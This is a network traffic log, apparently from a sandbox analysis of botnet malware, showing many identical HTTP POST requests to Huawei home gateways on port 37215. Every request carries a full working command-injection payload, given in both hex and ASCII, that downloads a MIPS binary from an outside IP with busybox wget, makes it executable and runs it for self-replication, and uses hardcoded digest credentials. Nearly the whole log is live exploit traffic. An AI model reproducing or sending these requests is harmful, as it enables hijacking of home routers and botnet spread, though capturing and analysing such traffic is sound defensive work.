                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1431192.168.2.2341460157.197.215.6437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536614895 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1432192.168.2.2350314157.15.122.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536619902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1433192.168.2.2358414157.23.75.14737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536621094 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1434192.168.2.2355818197.116.19.10937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536731958 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1435192.168.2.235090841.164.89.24437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536732912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1436192.168.2.2337794197.174.137.1937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536736012 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1437192.168.2.2334220197.234.142.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536751032 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1438192.168.2.233480468.123.215.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536755085 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1439192.168.2.2336586197.45.2.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536974907 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1440192.168.2.2350816104.23.65.13537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536978960 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
